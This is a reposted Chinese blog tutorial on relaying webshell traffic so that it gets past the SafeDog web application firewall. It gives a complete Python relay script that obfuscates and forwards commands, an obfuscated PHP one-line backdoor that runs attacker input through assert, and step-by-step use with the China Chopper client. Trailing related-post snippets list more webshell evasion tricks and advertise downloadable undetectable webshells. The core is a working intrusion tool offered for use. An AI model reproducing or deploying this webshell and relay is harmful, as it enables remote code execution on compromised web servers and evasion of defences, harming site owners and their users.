中转Webshell 绕过安全狗(二)

最新推荐文章于 2024-08-31 21:48:53 发布
转载 最新推荐文章于 2024-08-31 21:48:53 发布 · 266 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/xyongsec/p/11065382.html
文章标签:

#shell

本文介绍使用Python完成中转webshell绕过安全狗的方法。客户端需本地安装Python2,运行phpshellproxy.py;服务端shell端安装安全狗,使用做了混淆的reverse.php可过安全狗。还说明了使用方法,如替换地址、运行文件、连接shell及操作步骤等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

前言

在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。

客户端

本地127.0.0.1,安装python2
phpshellproxy.py

#coding=utf-8

import sys
reload(sys)
sys.setdefaultencoding('utf-8')

import web

urls = (
    '/','index',
    '/reverse','reverse',
    )

#render = web.template.render('templates/')
import json
import urllib

class index:
    def GET(self):
        return 1
class Base:
    def getpostdata(self, postdata):
        #content with &
        postdatalist = postdata.split('&')
        for pa in postdatalist:
            #content with =, can't split with =
            index = pa.find("=")
            setattr(self,pa[:index],urllib.unquote_plus(pa[index+1:]))
import requests
import codecs, urllib , base64 #, chardet
class reverse(Base, object):
    def GET(self,corpid):
        return 1
    def POST(self):
        data = web.data()
        #print data
        pwdata = data.split('&')[0].split('=')[1]
        #print pwdata
        #print 'pwdata', pwdata
        #print 'pwdata[::-1]', urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b')
        newpostdata = data.replace(pwdata, urllib.unquote(urllib.unquote(pwdata.replace('+',' '))[::-1]).replace('&','%26').replace('+','%2b'))
        #print 'newpostdata', newpostdata
        r = requests.post("http://192.168.253.129/waf/transServ.php", data=""+newpostdata.replace(' ','+'), headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36","Content-Type": "application/x-www-form-urlencoded"})#, proxies={'http':"http://127.0.0.1:8080"})
        #print r.apparent_encoding
        #r.encoding = 'gb2312'
        #print chardet.detect(r.content)
        #print r.text
        #return r.text
        return r.content 
if __name__ == "__main__":
    app = web.application(urls, globals())
    app.run()

  运行需要安装

pip install web
pip install requests

  服务端

shell端192.168.253.129,安装安全狗
reverse.php
做了点混淆,可过安全狗

<?php 
$DS = $_POST['x'];
$str = strrev($DS);
$a1 = array("1234","123456");
$a2 = array($str,"5461");
$ma = array_map(null,$a1,$a2)[0][1];
@assert($ma);

 

使用方法

  1. 替换phpshellproxy.py中的shell地址,需配合reverse.php使用

  2. 运行python phpshellproxy.py 9000 (端口自定义)

  3. 使用菜单连接对应shell地址,如 http://[ip]:9000/reverse ,输入对应密码,配置对应脚本类型,如果打开错误,建议清掉缓存,重新打开。

操作

本地运行phpshellproxy.py文件

 

中国菜刀进行连接http://127.0.0.1:9000/reverse  密码

 

 想了解更多 欢迎关注

 

转载于:https://www.cnblogs.com/xyongsec/p/11065382.html

[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
青藤云Webshell查杀绕过
Big World
12-30 1517
上周看到一些朋友在发青藤云的聊天记录,绕过一个发200块红包。周末的时候就简单做了个测试。 首先使用绕过D盾的webshell,发现被标记为恶意。这就有点意思了。我去看了一下聊天记录的内容,看原理是采用的深度学习的方式。猜测是有监督的方式来实现的(仅为猜测)。我这里绕过的思路采用的是,使用开源程序进行修改,带入一句话...
中转Webshell 绕过安全狗(一)
weixin_30311605的博客
06-21 228
前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shellshell接收后用同样的算法进行解密,执行命令。 客户...
Webshell的过滤绕过
hdlaichi_的博客
08-19 799
将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成进制再进行异或,异或完,又将结果从进制转换成了ASCII值,再将ASCII值转换成字符串。也就是说,'a'++ => 'b','b'++ => 'c'... 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。异或的进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是"!
webshell静态检测的绕过
qq_61142406的博客
03-23 3563
一句话木马原理: 基于_POST,[]等的检测 base64编码: $b = base64_encode(‘_POST’); echo $b; echo ‘<br/>’; echo base64_decode($b); gzcompress压缩: $c = gzcompress('_POST'); echo $c; echo '<br/>'; echo gzuncompress($c); 注释: @${$__}[!$_](${$__}[$_]);@$_="s"."s"./*-/*
记一次学习--webshell绕过
最新发布
banliyaoguai的博客
08-31 1139
这道题目要读取flag,且当前目录下的文件数目要大于三才可以读取,然后这里的思路就是创建文件。上面题目,下面的call_user_func有一个可变长参数,这个可变长参数是$parameters然后上面有一个if语句判断$parameters是否有action,如果有就删除掉,然后再action参数传system,在parameters传你要执行的命令。我们这里也要想办法利用A中的f,这个就要利用ob_start,ob_start调用例子,这里和call_user_func调用差不多。
详解新手如何绕过安全狗对网站进行Cookie中转注入攻击
1匹黑马
03-14 3041
随着网络安全逐渐被大家所重视,现在存在注入漏洞的网站越来越少(此处指asp+access或mssql),大多数网站使用了通用防注入程序,有的网站虽然没有直接使用通用防注入,但是其关键代码也是相差无几。 那么我们是不是就不能对这样的网站进行注入了呢?不!其实针对很多网站我们都可以使用cookie中转进行注入,刚好今天渗透了一个可以进行Cookie中转注入的网站,于是就把渗透心得分享给大家,小白操作,...
waf绕过方法总结
gugonggugong的博客
12-30 3139
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
Cool_in_one_hundred_lines_of_code.pdf
08-08
What Is Web shell? “大马” “小马” “一句话” ...一句话原理 网页请求响应过程 “攻守道” Webshell查杀与拦截 Webshell查杀 内容查杀——文件包含 代码免杀——刨除变量与函数的关联 ...中转webshell
网络安全名词解释&操作系统
m0_73245690的博客
07-20 1562
系统用户包括本地用户、网络用户和系统管理员,用于执行系统操作和管理任务。用户组用于将多个用户组织在一起,以便统一管理权限和资源访问。服务用户是专门为运行服务或应用程序创建的账户,需要根据服务的要求配置相应的权限。Windows Defender 防火墙(Windows 系统)(Linux 系统)pf(FreeBSD / macOS 系统)这些防火墙通常提供基本的网络保护功能,并允许用户配置详细的规则来控制流量。出站规则和入站规则分别控制从计算机发出的流量和进入计算机的流量。
安全狗shell
07-09
安全狗shell,有兴趣的朋友下载一下
2016最新aspx免杀webshell安全狗
03-05
上传压缩文件夹里的aspx文件不会有任何报毒,过最新版安全狗。2016已测试
2019最新过狗过,云锁,360等WAF的PHP免杀大马
02-02
2019最新过狗过,云锁,360等WAF的PHP免杀大马等主流防护软件
webshell的过滤绕过
middlecorn的博客
08-20 680
将把 a 变成 '['('Z' 的 ASCII 值是 90,'[' 的 ASCII 值是 91)。在PHP中,两个变量进行异或时,先会将字符串转换成ASCII值,再将ASCII值转换成进制再进行异或,异或完,又将结果从进制转换成了ASCII值,再将ASCII值转换成字符串。也就是说,'a'++ => 'b','b'++ => 'c'... 所以,我们只要能拿到一个变量,其值为a,通过自增操作即可获得a-z中所有字符。异或的进制的值是00100001,对应的ASCII值是33,对应的字符串的值就是"!
绕过安全狗_中转Webshell 绕过安全狗(一)
weixin_39838328的博客
12-30 290
前言听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数全部进行加密,然后再发送给shellshell接收后用同样的算法进行解密,执行命令。客户端本...
Webshell如何bypass安全狗,D盾
蚁景网安学院
01-17 340
↑ 点击上方“合天智汇”关注我们01 前言相信各位师傅都有自己过waf一句话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的git...
河马php一句话木马,一句话木马的套路
weixin_42127020的博客
03-10 403
0x01 前言尽最大努力在一文中让大家掌握一些有用的 WEBSHELL 免杀技巧。0x02 关于 eval 于 assert关于 eval 函数在 php 给出的官方说明是eval 是一个语言构造器而不是一个函数,不能被 可变函数 调用可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来执行通俗的说比如你这样是不行的 也造就了用...
webshell免杀之数据特征绕过
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
11-20 449
webshell免杀之数据特征绕过
2016年有效PHP免杀Webshell绕过安全狗技术
此处指的是技术手段,使得Webshell能够在安全狗的检测下正常工作,即绕过安全狗的防护。 #### 描述解析 描述中提到“上传压缩文件夹里的php文件不会有任何报毒,过最新版安全狗”,说明该文件提供了某种方式或技术...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值